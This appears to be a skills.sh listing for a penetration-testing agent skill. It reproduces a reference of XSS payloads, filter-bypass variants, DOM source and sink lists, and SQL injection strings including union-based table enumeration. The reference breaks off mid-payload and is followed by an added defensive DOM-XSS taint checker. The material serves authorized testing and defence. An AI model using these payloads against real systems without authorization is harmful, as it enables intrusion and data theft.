
Security Pen Testing
Apply authorized, non-destructive XSS and injection test payloads and bypass patterns while hardening web apps before release.
Install
npx skills add https://github.com/alirezarezvani/claude-skills --skill security-pen-testing
What is this skill?
- Reflected XSS payload sets for search fields, URL parameters, forms, and headers
- Filter-bypass variants including case mixing, nested tags, char-code alerts, and SVG/onload vectors
- URL-encoded and context-specific attribute-breakout payloads
- Framed for authorized penetration tests, CTF practice, and defensive detection—not exploitation of third parties
Adoption & trust: 570 installs on skills.sh; 17.5k GitHub stars; 3/3 security scanners passed (skills.sh audits).
Journey fit
Ship/security is the canonical shelf because the skill supplies offensive test patterns meant for pre-release verification and defensive research—not ideation or growth analytics. Penetration-style input testing belongs in security subphase alongside reviews and hardening before you expose user-facing forms and parameters.
Common Questions / FAQ
Is Security Pen Testing safe to install?
skills.sh reports 3 of 3 security scanners passed. Review the Security Audits panel on this page before installing in production.
SKILL.md - Security Pen Testing
# Attack Patterns Reference

Safe, non-destructive test payloads and detection patterns for authorized security testing. All techniques here are for use in authorized penetration tests, CTF challenges, and defensive research only.

---

## XSS Test Payloads

### Reflected XSS

These payloads test whether user input is reflected in HTTP responses without proper encoding. Use in search fields, URL parameters, form inputs, and HTTP headers.

**Basic payloads:**

```
<script>alert(document.domain)</script>
"><script>alert(document.domain)</script>
'><script>alert(document.domain)</script>
<img src=x onerror=alert(document.domain)>
<svg onload=alert(document.domain)>
<body onload=alert(document.domain)>
<input onfocus=alert(document.domain) autofocus>
<marquee onstart=alert(document.domain)>
<details open ontoggle=alert(document.domain)>
```

**Filter bypass payloads:**

```
<ScRiPt>alert(document.domain)</ScRiPt>
<scr<script>ipt>alert(document.domain)</scr</script>ipt>
<script>alert(String.fromCharCode(100,111,99,117,109,101,110,116,46,100,111,109,97,105,110))</script>
<img src=x onerror="alert(1)">
<svg/onload=alert(document.domain)>
javascript:alert(document.domain)//
```

**URL encoding payloads:**

```
%3Cscript%3Ealert(document.domain)%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
```

**Context-specific payloads:**

Inside HTML attribute:

```
" onmouseover="alert(document.domain)
' onfocus='alert(document.domain)' autofocus='
```

Inside JavaScript string:

```
';alert(document.domain);//
\';alert(document.domain);//
</script><script>alert(document.domain)</script>
```

Inside CSS:

```
expression(alert(document.domain))
url(javascript:alert(document.domain))
```

### Stored XSS

Test these in persistent fields: user profiles, comments, forum posts, file upload names, chat messages.
```
<img src=x onerror=alert(document.domain)>
<a href="javascript:alert(document.domain)">click me</a>
<svg><animate onbegin=alert(document.domain) attributeName=x dur=1s>
```

### DOM-Based XSS

Look for JavaScript that reads from these sources and writes to dangerous sinks:

**Sources** (attacker-controlled input):

```
document.location
document.location.hash
document.location.search
document.referrer
window.name
document.cookie
localStorage / sessionStorage
postMessage data
```

**Sinks** (dangerous output):

```
element.innerHTML
element.outerHTML
document.write()
document.writeln()
eval()
setTimeout(string)
setInterval(string)
new Function(string)
element.setAttribute("onclick", ...)
location.href = ...
location.assign(...)
```

**Detection pattern:** Search for any code path where a Source flows into a Sink without sanitization.

---

## SQL Injection Detection Patterns

### Detection Payloads

**Error-based detection:**

```
'                -- Single quote triggers SQL error
"                -- Double quote
\                -- Backslash
' OR '1'='1      -- Boolean true
' OR '1'='2      -- Boolean false (compare responses)
' AND 1=1--      -- Boolean true with comment
' AND 1=2--      -- Boolean false (compare responses)
1 OR 1=1         -- Numeric injection
1 AND 1=2        -- Numeric false
```

**Union-based enumeration** (authorized testing only):

```sql
-- Step 1: Find column count
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--                -- Increment until error
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--    -- Match column count

-- Step 2: Find displayable columns
' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--

-- Step 3: Extract database info
' UNION SELECT version(),NULL,NULL--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
```

**Time-based blind injection:**

```sql
-- MySQL
' AND SLEEP(5)--
' AND IF(1=1, SLEEP(5), 0)--
' AND IF(SUBSTRING(version(),1,1)='5', SLEE
```
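For the DOM-Based XSS detection pattern in the SKILL.md above (find any code path where a Source flows into a Sink), here is an added example that is not part of the skill or its repository: a small lexical taint checker in JavaScript built from the skill's own source and sink lists. It assumes one statement per line, taint that spreads only through plain assignments, a postMessage handler parameter named `event`, and a constructed sample snippet; it over-reports because it has no parser.

```javascript
// Added example (not the skill's own code): a lexical checker for the DOM XSS
// source -> sink flows listed above. Assumes one statement per line, taint that
// spreads through plain assignments, and a postMessage handler parameter named
// "event". It over-reports (no parser) and is a review aid, not a proof.
const SOURCES = [
  /\b(?:document\.|window\.)?location\b/, /\bdocument\.referrer\b/,
  /\bwindow\.name\b/, /\bdocument\.cookie\b/, /\bevent\.data\b/,
  /\b(?:localStorage|sessionStorage)\.getItem\(/,
];
const SINKS = [ // each regex captures the expression that reaches the sink
  { name: "innerHTML/outerHTML", re: /\.(?:inner|outer)HTML\s*=(?!=)\s*(.+)$/ },
  { name: "document.write", re: /\bdocument\.write(?:ln)?\((.+)\)/ },
  { name: "eval", re: /\beval\((.+)\)/ },
  { name: "setTimeout/setInterval", re: /\bset(?:Timeout|Interval)\((.+?),/ },
  { name: "new Function", re: /\bnew Function\((.+)\)/ },
  { name: "setAttribute(on*)", re: /\.setAttribute\(\s*["']on\w+["']\s*,(.+)\)/ },
  { name: "location.href", re: /\blocation\.href\s*=(?!=)\s*(.+)$/ },
  { name: "location.assign", re: /\blocation\.assign\((.+)\)/ },
];
function isTainted(expr, tainted) {
  if (SOURCES.some((re) => re.test(expr))) return true;
  return [...tainted].some((v) => new RegExp("\\b" + v + "\\b").test(expr));
}
// Returns [{ line, sink }] for every sink fed by a source or a tainted variable.
function findDomXssFlows(code) {
  const tainted = new Set(), findings = [];
  code.split("\n").forEach((raw, i) => {
    const line = raw.trim().replace(/;$/, "");
    for (const { name, re } of SINKS) {
      const m = re.exec(line);
      if (m && isTainted(m[1], tainted)) return findings.push({ line: i + 1, sink: name });
    }
    const assign = /^(?:var|let|const)?\s*(\w+)\s*=(?!=)\s*(.+)$/.exec(line);
    if (assign && isTainted(assign[2], tainted)) tainted.add(assign[1]);
  });
  return findings;
}
// Constructed sample: lines 3, 6 and 9 are flows; line 4 uses a safe sink.
const SAMPLE = [
  "const params = new URLSearchParams(document.location.search)",
  'const q = params.get("q")',
  'document.getElementById("out").innerHTML = "Results for " + q',
  'document.getElementById("out").textContent = q',
  'window.addEventListener("message", function (event) {',
  "  eval(event.data)",
  "})",
  "const page = location.hash.slice(1)",
  "location.href = page",
].join("\n");
console.log(findDomXssFlows(SAMPLE)); // three findings: lines 3, 6 and 9
```

Every flagged line is a candidate for the encoding or safe-sink fix (for example `textContent` instead of `innerHTML`), and lines that merely read a source are not reported on their own.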